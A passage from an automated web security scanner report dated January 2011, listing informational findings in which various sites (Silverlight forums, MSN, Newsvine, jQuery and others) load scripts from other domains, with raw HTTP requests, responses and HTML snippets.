Path:	/forums/t/217726.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.114. http://forums.silverlight.net/forums/t/217727.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217727.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.115. http://forums.silverlight.net/forums/topicsactive.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/topicsactive.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.116. http://forums.silverlight.net/forums/viewall.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/viewall.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.117. http://forums.silverlight.net/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/search/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.118. http://forums.silverlight.net/user/viewonline.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.119. http://games.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://az13127.vo.msecnd.net/anaheim-6/scripts/common/common.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/fasttrack.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/friendcache.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gamecache.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gb.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/invitefriend.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-1.4.2.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-ui-1.8.1.custom.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.jscrollpane-1.2.3.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.mousewheel-3.0.2.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.core.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.fbfeedformat.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.widget.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/json2.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/header.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_auxiliary.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_code.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/profilepage.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/site.master.min.js

Request

GET / HTTP/1.1
Host: games.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-WR-L: 74,NC
Set-Cookie: MSGmSession=RUID=d177791d618543afa46923d904b9fd9b&Env=AP2; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:32 GMT
Connection: close
Content-Length: 45429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta http-equiv=
...[SNIP]...
</style><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gamecache.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-1.4.2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-ui-1.8.1.custom.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.mousewheel-3.0.2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.jscrollpane-1.2.3.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.core.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.widget.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.fbfeedformat.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/profilepage.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/invitefriend.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/json2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gb.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/common.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/friendcache.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/header.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/site.master.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/fasttrack.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_code.min.js" type="text/javascript"></script>
<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_auxiliary.min.js" type="text/javascript"></script>
...[SNIP]...

23.120. http://glo.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://glo.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js
http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js
http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js
http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js
http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js

Request

GET / HTTP/1.1
Host: glo.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:46:32 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="template" xmlns:fb=
...[SNIP]...
<meta property="og:image" content="http://static.glo.com/photos/ThumbNail/27126_ThumbNail.jpg" />

<script src="http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js"></script>
<script src="http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js"></script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js"></script>
...[SNIP]...
</div>

<script src="http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js"></script>
...[SNIP]...

23.121. http://health.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.redacted
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET / HTTP/1.1
Host: health.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.122. http://helenaspopkin.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:53:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=73fa8580b941fa2c3fb9c3b955a4d083; expires=Sat, 25-Jan-2031 17:53:02 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.123. http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://informationarbitrage.com
Path:	/post/3007820135/start-fund-no-big-deal-business-as-usual

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://edge.quantserve.com/quant.js
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://www.google.com/jsapi
http://www.iaventures.com/InformationArbitrage/Scripts/AC_RunActiveContent.js
http://www.iaventures.com/InformationArbitrage/jquery.js
http://www.iaventures.com/InformationArbitrage/widget.js?css=default&minsize=80&maxsize=130
http://www.statcounter.com/counter/counter.js

Request

GET /post/3007820135/start-fund-no-big-deal-business-as-usual HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
X-Tumblr-User: informationarbitrage
Link: <http://tumblr.com/xxg1dqs0vb>; rel=shorturl
Link: <http://29.media.tumblr.com/avatar_52233725e86f_16.png>; rel=icon
Vary: Accept-Encoding
X-Tumblr-Usec: D=276465
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 14:47:50 GMT
X-Varnish: 1726456178 1726409864
Age: 22
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 33469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</style>
<script src="http://www.iaventures.com/InformationArbitrage/Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.iaventures.com/InformationArbitrage/jquery.js"></script><script type="text/javascript" src="http://www.iaventures.com/InformationArbitrage/widget.js?css=default&minsize=80&maxsize=130"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="linkedin">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
<div id="facebook">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.124. http://ingame.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_static/js/a49e2edd06ea3021c364449ff5b7671d97b3c46e.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.125. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

23.126. http://insidemsn.wordpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://insidemsn.wordpress.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110

Request

GET / HTTP/1.1
Host: insidemsn.wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 23:47:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sat, 29 Jan 2011 23:43:32 +0000
Cache-Control: max-age=86, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://insidemsn.wordpress.com/xmlrpc.php
Link: <http://wp.me/16dqb>; rel=shortlink
X-nananana: Batcache
Content-Length: 28282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<!--
generate
...[SNIP]...
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1296073727g" type="text/css" />
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

23.127. http://investing.money.redacted/investments/charts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/charts

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js

Request

GET /investments/charts HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.128. http://investing.money.redacted/investments/currency-exchange-rates/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/currency-exchange-rates/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js

Request

GET /investments/currency-exchange-rates/ HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.129. http://investing.money.redacted/investments/market-index/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/market-index/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js

Request

Response

23.130. http://investing.money.redacted/investments/market-summary previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/market-summary

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /investments/market-summary HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.131. http://investing.money.redacted/investments/stock-price previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/stock-price

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js

Request

Response

23.132. http://investing.money.redacted/investments/stock-price/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/stock-price/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img.widgets.video.s-redacted/js/embed.js

Request

Response

23.133. http://javascript.nwbox.com/IEContentLoaded/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://javascript.nwbox.com
Path:	/IEContentLoaded/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /IEContentLoaded/ HTTP/1.1
Host: javascript.nwbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 09:01:58 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Sun, 01 Aug 2010 04:41:14 GMT
ETag: "4366-b1a50e80"
Accept-Ranges: bytes
Content-Length: 17254
Cache-Control: max-age=259200
Expires: Wed, 02 Feb 2011 09:01:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>IECo
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

23.134. http://jcfootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jcfootball.scout.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

GET / HTTP/1.1
Host: jcfootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:07 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:07 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT
ETag: "1CBC00F93FC0280"
Content-Type: text/html
Content-Length: 41053

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>JC Football Recruiting Front Page</title>
<meta http
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.135. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Jan 2011 23:10:28 GMT
ETag: "4960174-3eb0-7da86100"
Accept-Ranges: bytes
Content-Length: 16048
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

23.136. http://jquery.org/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/license

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 30 Jan 2011 00:58:34 GMT
ETag: "79985e2-206a-cc71e280"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Sun, 30 Jan 2011 02:14:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
